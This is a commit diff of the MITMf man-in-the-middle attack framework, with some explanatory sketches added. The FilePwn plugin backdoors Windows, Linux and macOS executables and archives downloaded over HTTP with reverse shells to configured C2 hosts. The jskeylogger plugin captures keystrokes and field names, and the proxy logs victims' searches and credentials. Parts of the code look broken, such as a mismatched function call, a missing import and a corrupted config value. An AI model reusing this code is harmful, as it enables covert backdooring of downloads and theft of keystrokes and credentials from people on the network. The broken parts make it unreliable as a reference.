Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-11 15:47:10 -07:00)
- Updated FilePwn plugin with BDFactory v0.2 + license
- Added partial OS and browser detection through clients' user-agents (see the sketch below the changed-files summary)
- Improved jskeylogger plugin (now detects input field names)
- Fixed bug where jskeylogger sent invalid charCodes on Android devices
- Cleaned search engine query parsing code in ServerConnection.py
- Updated setup.sh with new libs
This commit is contained in: parent a4e8869fc6, commit 4ae50e6e0c
8 changed files with 503 additions and 143 deletions
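The new OS/browser detection is built on the user_agents library that setup.sh now installs (pip install ua-parser user-agents). A minimal sketch of how a client-info log prefix can be derived from the User-Agent header, following the pattern the diff adds to ServerConnection.py; the UA string and IP below are invented examples:

# Sketch only (Python 2, matching the codebase): build the "IP [type:browser-version os:family]" prefix.
from user_agents import parse

ua_string = "Mozilla/5.0 (Linux; Android 4.4.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.136 Mobile Safari/537.36"  # example value
user_agent = parse(ua_string)

# browser.family, browser.version and os.family are the attributes used in sendRequest()
clientInfo = "%s [type:%s-%s os:%s] " % ("192.168.1.50",               # client IP (placeholder)
                                         user_agent.browser.family,
                                         user_agent.browser.version[0],
                                         user_agent.os.family)
print clientInfo + "Sending Request: example.com"

user_agents only recognizes browsers and operating systems in its rule set, which is presumably why the commit message calls the detection "partial".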
@@ -1,3 +1,41 @@
"""
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'

Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com

Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.

Tested on Kali-Linux.

"""

[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files

@@ -10,6 +48,18 @@ maxSize = 40000000

blacklist = .dll, #don't do dlls in a zip file

[TAR]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way

patchCount = 5

# In Bytes
maxSize = 40000000

blacklist = , # a comma is null do not leave blank

[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads

@@ -18,9 +68,11 @@ blacklist = .dll, #don't do dlls in a zip file

LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64

FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large

CompressedFiles = True #True/False
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2

@@ -30,16 +82,16 @@ blacklist = .dll, #don't do dlls in a zip file

[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.10.4
PORT = 6666
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp

[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.10.4
PORT = 6666
SHELL = iat_reverse_tcp
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True

@@ -50,7 +102,21 @@ blacklist = .dll, #don't do dlls in a zip file

HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp

[[[MachoIntelx86]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp

[[[MachoIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
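For reference, the nested [targets] tree above is read by the FilePwn plugin through configobj's dictionary-style section access (the access paths below come from the plugin diff further down; the config filename and the intermediate [[ALL]] section are assumptions, since neither is shown in this excerpt):

# Sketch only (Python 2, as in the repo): reading the BDFProxy-style config with configobj.
from configobj import ConfigObj

userConfig = ConfigObj('config/filepwn.cfg')   # placeholder path, not necessarily the real filename

# Triple-bracket sections such as [[[LinuxIntelx86]]] become nested dicts
linux_x86 = userConfig['targets']['ALL']['LinuxIntelx86']
print linux_x86['SHELL'], linux_x86['HOST'], int(linux_x86['PORT'])

# Per-archive limits come from the [ZIP] and [TAR] sections
print int(userConfig['ZIP']['maxSize']), int(userConfig['TAR']['patchCount'])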
@@ -1 +1 @@
Subproject commit 89d87b2fa1a499998a2109a751d8869e52485e0c
Subproject commit 303d059c4c2a1ecc19824bd755129152b6ad7fc1
@@ -19,6 +19,7 @@
import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins

from user_agents import parse
from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins

@@ -46,6 +47,7 @@ class ServerConnection(HTTPClient):
self.postData = postData
self.headers = headers
self.client = client
self.clientInfo = None
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.plugins = ProxyPlugins.getInstance()

@@ -73,50 +75,25 @@ class ServerConnection(HTTPClient):

def sendRequest(self):
if self.command == 'GET':
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.info(message)
user_agent = parse(self.headers['user-agent'])
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)

logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])

#Capture google searches
if ('google' in self.headers['host']):
if ('search' in self.uri): #and ('search' in self.uri):
try:
for param in self.uri.split('&'):
if param.split('=')[0] == 'q':
query = str(param.split('=')[1])
if query:
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
except Exception, e:
error = str(e)
logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
if ('search' in self.uri):
self.captureQueries('q')

#Capture bing searches
if ('bing' in self.headers['host']):
if ('Suggestions' in self.uri):
try:
for param in self.uri.split('&'):
if param.split('=')[0] == 'qry':
query = str(param.split('=')[1])
if query:
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
except Exception, e:
error = str(e)
logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
self.captureQueries('qry')

#Capture yahoo searches
if ('search.yahoo' in self.headers['host']):
if ('nresults' in self.uri):
try:
for param in self.uri.split('&'):
if param.split('=')[0] == 'command':
query = str(param.split('=')[1])
if query:
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
except Exception, e:
error = str(e)
logging.warning("%s Error parsing yahoo search query %s" % (self.client.getClientIP(), error))
self.captureQueries('command')

#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
for user in self.http_userfields:

@@ -126,12 +103,22 @@ class ServerConnection(HTTPClient):
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)

if (username and password):
message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
logging.warning(message)
logging.warning(self.clientInfo + "%s Possible Credentials (%s):\n%s" % (self.command, self.headers['host'], self.uri))

self.plugins.hook()
self.sendCommand(self.command, self.uri)

def captureQueries(self, search_param):
try:
for param in self.uri.split('&'):
if param.split('=')[0] == search_param:
query = str(param.split('=')[1])
if query:
logging.info(self.clientInfo + "is querying %s for: %s" % (self.headers['host'], query))
except Exception, e:
error = str(e)
logging.warning(self.clientInfo + "Error parsing google search query %s" % error)

def sendHeaders(self):
for header, value in self.headers.items():
logging.debug("Sending header: (%s => %s)" % (header, value))

@@ -145,11 +132,7 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri:
self.plugins.hook()
else:
message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.warning(message)
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
self.transport.write(self.postData)

def connectionMade(self):
10 mitmf.py
@@ -9,6 +9,16 @@ from libs.sergioproxy.ProxyPlugins import ProxyPlugins
import sys, logging, traceback, string, os
import argparse

try:
import user_agents
except:
sys.exit("[-] user_agents library not installed!")

try:
import configobj
except:
sys.exit("[-] configobj library not installed!")

from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
@@ -2,6 +2,44 @@
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
#################################################################################################

"""
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'

Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com

Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.

Tested on Kali-Linux.

"""

import sys
import os
import pefile

@@ -10,12 +48,14 @@ import logging
import shutil
import random
import string
from libs.bdfactory import pebin, elfbin
import tarfile
from libs.bdfactory import pebin
from libs.bdfactory import elfbin
from libs.bdfactory import machobin
from plugins.plugin import Plugin
from tempfile import mkstemp
from configobj import ConfigObj


class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"

@@ -23,23 +63,28 @@ class FilePwn(Plugin):
has_opts = False
desc = "Backdoor executables being sent over http using bdfactory"

def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None

def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options

self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']
#FOR FUTURE USE
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']

#FOR FUTURE USE
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']

#USED NOW
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
'pe': {'number': 'MZ', 'offset': 0},
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
'bz': {'number': 'BZ', 'offset': 0},
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
'tar': {'number': 'ustar', 'offset': 257},
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
}

#NOT USED NOW
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
@@ -51,10 +96,28 @@ class FilePwn(Plugin):
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
self.zipblacklist = self.userConfig['ZIP']['blacklist']
self.tarblacklist = self.userConfig['TAR']['blacklist']

print "[*] FilePwn plugin online"

def convert_to_Bool(self, aString):
if aString.lower() == 'true':
return True
elif aString.lower() == 'false':
return False
elif aString.lower() == 'none':
return None

def bytes_have_format(self, bytess, formatt):
number = self.magicNumbers[formatt]
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
return True
return False

def binaryGrinder(self, binaryFile):
"""
Feed potential binaries into this function,
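The magicNumbers table and bytes_have_format() above are what let handleResponse() (later in this diff) sniff the payload's leading bytes instead of trusting the Content-Type header alone. A condensed, self-contained sketch of that detection, using the same signatures and offsets; the sample file path is an arbitrary placeholder:

# Sketch only (Python 2): standalone version of FilePwn's magic-number sniffing.
MAGIC_NUMBERS = {
    'elf':      {'number': '7f454c46'.decode('hex'), 'offset': 0},
    'pe':       {'number': 'MZ',                     'offset': 0},
    'gz':       {'number': '1f8b'.decode('hex'),     'offset': 0},
    'bz':       {'number': 'BZ',                     'offset': 0},
    'zip':      {'number': '504b0304'.decode('hex'), 'offset': 0},
    'tar':      {'number': 'ustar',                  'offset': 257},
    'fatfile':  {'number': 'cafebabe'.decode('hex'), 'offset': 0},
    'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
    'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
}

def bytes_have_format(data, formatt):
    # True if the byte string carries formatt's magic at the expected offset
    magic = MAGIC_NUMBERS[formatt]
    return data[magic['offset']:magic['offset'] + len(magic['number'])] == magic['number']

sample = open('/bin/ls', 'rb').read()  # placeholder input
for kind in ('pe', 'elf', 'fatfile', 'machox64', 'machox86', 'zip', 'gz', 'bz', 'tar'):
    if bytes_have_format(sample, kind):
        print '[*] Detected', kind
        break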
@@ -118,7 +181,7 @@ class FilePwn(Plugin):
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
)

@@ -126,17 +189,17 @@ class FilePwn(Plugin):

elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF

targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()

if targetFile.class_type == 0x1:
#x86
#x86CPU Type
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
@@ -147,24 +210,200 @@ class FilePwn(Plugin):
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()

elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
targetFile.support_check()

#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE

if targetFile.FAT_FILE is True:
if self.FatPriority == 'x86':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()

elif self.FatPriority == 'x64':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()

elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx86['SHELL'],
HOST=self.MachoIntelx86['HOST'],
PORT=int(self.MachoIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()

elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
targetFile = machobin.machobin(FILE=binaryFile,
OUTPUT = os.path.basename(binaryFile),
SHELL=self.MachoIntelx64['SHELL'],
HOST=self.MachoIntelx64['HOST'],
PORT=int(self.MachoIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
FAT_PRIORITY=self.FatPriority
)
result = targetFile.run_this()

return result

except Exception as e:
print 'Exception', str(e)
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None

def zipGrinder(self, aZipFile):
def tar_files(self, aTarFileBytes, formatt):
"When called will unpack and edit a Tar File and return a tar file"

print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'

if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
print "[!] TarFile over allowed size"
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
return aTarFileBytes

with tempfile.NamedTemporaryFile() as tarFileStorage:
tarFileStorage.write(aTarFileBytes)
tarFileStorage.flush()

if not tarfile.is_tarfile(tarFileStorage.name):
print '[!] Not a tar file'
return aTarFileBytes

compressionMode = ':'
if formatt == 'gz':
compressionMode = ':gz'
if formatt == 'bz':
compressionMode = ':bz2'

tarFile = None
try:
tarFileStorage.seek(0)
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
except tarfile.ReadError:
pass

if tarFile is None:
print '[!] Not a tar file'
return aTarFileBytes

print '[*] Tar file contents and info:'
print '[*] Compression:', formatt

members = tarFile.getmembers()
for info in members:
print "\t", info.name, info.mtime, info.size

newTarFileStorage = tempfile.NamedTemporaryFile()
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)

patchCount = 0
wasPatched = False

for info in members:
print "[*] >>> Next file in tarfile:", info.name

if not info.isfile():
print info.name, 'is not a file'
newTarFile.addfile(info, tarFile.extractfile(info))
continue

if info.size >= long(self.FileSizeMax):
print info.name, 'is too big'
newTarFile.addfile(info, tarFile.extractfile(info))
continue

# Check against keywords
keywordCheck = False

if type(self.tarblacklist) is str:
if self.tarblacklist.lower() in info.name.lower():
keywordCheck = True

else:
for keyword in self.tarblacklist:
if keyword.lower() in info.name.lower():
keywordCheck = True
continue

if keywordCheck is True:
print "[!] Tar blacklist enforced!"
logging.info('Tar blacklist enforced on %s', info.name)
continue

# Try to patch
extractedFile = tarFile.extractfile(info)

if patchCount >= int(self.userConfig['TAR']['patchCount']):
newTarFile.addfile(info, extractedFile)
else:
# create the file on disk temporarily for fileGrinder to run on it
with tempfile.NamedTemporaryFile() as tmp:
shutil.copyfileobj(extractedFile, tmp)
tmp.flush()
patchResult = self.binaryGrinder(tmp.name)
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(tmp.name)
print "[*] Patching complete, adding to tar file."
info.size = os.stat(file2).st_size
with open(file2, 'rb') as f:
newTarFile.addfile(info, f)
logging.info("%s in tar patched, adding to tarfile", info.name)
os.remove(file2)
wasPatched = True
else:
print "[!] Patching failed"
with open(tmp.name, 'rb') as f:
newTarFile.addfile(info, f)
logging.info("%s patching failed. Keeping original file in tar.", info.name)
if patchCount == int(self.userConfig['TAR']['patchCount']):
logging.info("Met Tar config patchCount limit.")

# finalize the writing of the tar file first
newTarFile.close()

# then read the new tar file into memory
newTarFileStorage.seek(0)
ret = newTarFileStorage.read()
newTarFileStorage.close() # it's automatically deleted

if wasPatched is False:
# If nothing was changed return the original
print "[*] No files were patched forwarding original file"
return aTarFileBytes
else:
return ret

def zip_files(self, aZipFile):
"When called will unpack and edit a Zip File and return a zip file"

logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'

if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
logging.info("ZipFIle maxSize met %s" % len(aZipFile))
print "[!] ZipFile over allowed size"
logging.info("ZipFIle maxSize met %s", len(aZipFile))
return aZipFile

tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
@@ -187,21 +426,24 @@ class FilePwn(Plugin):
logging.info('Encrypted zipfile found. Not patching.')
return aZipFile

logging.info("ZipFile contents and info:")
print "[*] ZipFile contents and info:"

for info in zippyfile.infolist():
logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
print "\t", info.filename, info.date_time, info.file_size

zippyfile.extractall(tmpDir)

patchCount = 0

wasPatched = False

for info in zippyfile.infolist():
logging.info(">>> Next file in zipfile: %s" % info.filename)
print "[*] >>> Next file in zipfile:", info.filename

if os.path.isdir(tmpDir + '/' + info.filename) is True:
logging.info('%s is a directory' % info.filename)
print info.filename, 'is a directory'
continue

#Check against keywords
keywordCheck = False

@@ -216,7 +458,8 @@ class FilePwn(Plugin):
continue

if keywordCheck is True:
logging.info('Zip blacklist enforced on %s' % info.filename)
print "[!] Zip blacklist enforced!"
logging.info('Zip blacklist enforced on %s', info.filename)
continue

patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)

@@ -224,12 +467,16 @@ class FilePwn(Plugin):
if patchResult:
patchCount += 1
file2 = "backdoored/" + os.path.basename(info.filename)
print "[*] Patching complete, adding to zip file."
shutil.copyfile(file2, tmpDir + '/' + info.filename)
logging.info("%s in zip patched, adding to zipfile" % info.filename)

logging.info("%s in zip patched, adding to zipfile", info.filename)
os.remove(file2)
wasPatched = True
else:
logging.info("%s patching failed. Keeping original file in zip." % info.filename)
print "[!] Patching failed"
logging.info("%s patching failed. Keeping original file in zip.", info.filename)

print '-' * 10

if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
logging.info("Met Zip config patchCount limit.")

@@ -239,12 +486,12 @@ class FilePwn(Plugin):

zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)

logging.debug("Writing to zipfile: %s" % tmpFile)
print "[*] Writing to zipfile:", tmpFile

for base, dirs, files in os.walk(tmpDir):
for afile in files:
filename = os.path.join(base, afile)
logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))

zipResult.close()

@@ -252,24 +499,43 @@ class FilePwn(Plugin):
shutil.rmtree(tmpDir)

with open(tmpFile, 'rb') as f:
aZipFile = f.read()
tempZipFile = f.read()
os.remove(tmpFile)

if wasPatched is False:
print "[*] No files were patched forwarding original file"
return aZipFile
else:
return tempZipFile

def handleResponse(self, request, data):

content_header = request.client.headers['Content-Type']
client_ip = request.client.getClientIP()

if content_header in self.zipMimeTypes:
logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
bd_zip = self.zipGrinder(data)

if self.bytes_have_format(data, 'zip'):
logging.info("%s Detected supported zip file type!" % client_ip)
bd_zip = self.zip_files(data)
if bd_zip:
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
logging.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_zip}

else:
for tartype in ['gz','bz','tar']:
if self.bytes_have_format(data, tartype):
logging.info("%s Detected supported tar file type!" % client_ip)
bd_tar = self.tar_files(data)
if bd_tar:
logging.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_tar}

elif content_header in self.binaryMimeTypes:
logging.info("%s Detected supported binary type!" % request.client.getClientIP())
for bintype in ['pe','elf','fatfile','machox64','machox86']:
if self.bytes_have_format(data, bintype):
logging.info("%s Detected supported binary type!" % client_ip)
fd, tmpFile = mkstemp()
with open(tmpFile, 'w') as f:
f.write(data)

@@ -279,9 +545,9 @@ class FilePwn(Plugin):
if patchb:
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
os.remove('./backdoored/' + os.path.basename(tmpFile))
logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
logging.info("%s Patching complete, forwarding to client" % client_ip)
return {'request': request, 'data': bd_binary}

else:
logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
logging.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
return {'request': request, 'data': data}
@@ -2,7 +2,6 @@ from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging


class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"

@@ -13,14 +12,19 @@ class jskeylogger(Inject, Plugin):
def initialize(self, options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()

print "[*] Javascript Keylogger plugin online"

def sendPostData(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
keys = request.postData.split(",")

raw_keys = request.postData.split("&&")[0]
keys = raw_keys.split(",")
del keys[0]; del(keys[len(keys)-1])

input_field = request.postData.split("&&")[1]

nice = ''
for n in keys:
if n == '9':
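The keylogger now POSTs a body of the form ",<hex keycode>,<hex keycode>,...,&&<input field name>" (see xhr.send(var2 + '&&' + inputName) in the JavaScript payload further down), and sendPostData() above splits on "&&" and ",", then hex-decodes each code. A standalone sketch of that parsing; the sample payload is invented:

# Sketch only (Python 2): decode a keylog POST body of the form ",<hex>,<hex>,...,&&<fieldname>".
post_data = ",70,61,73,73,31,32,33,&&password"   # invented example payload

raw_keys, input_field = post_data.split("&&")
keys = raw_keys.split(",")
del keys[0]; del keys[len(keys) - 1]              # strip the empty entries around the list

nice = ''
for n in keys:
    if n == '9':
        nice += "<TAB>"                           # control keys (tab/backspace/enter) are special-cased; "<TAB>" is illustrative
    else:
        try:
            nice += n.decode('hex')               # e.g. '70' -> 'p'
        except TypeError:
            pass                                  # skip malformed codes instead of crashing

print "Field: %s Keys: %s" % (input_field, nice)  # Field: password Keys: pass123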
@@ -33,9 +37,14 @@ class jskeylogger(Inject, Plugin):
try:
nice += n.decode('hex')
except:
logging.warning("%s ERROR decoding char %s" % (request.client.getClientIP(), n))
logging.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))

logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
#try:
#    input_field = input_field.decode('hex')
#except:
#    logging.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))

logging.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))

def msf_keylogger(self):
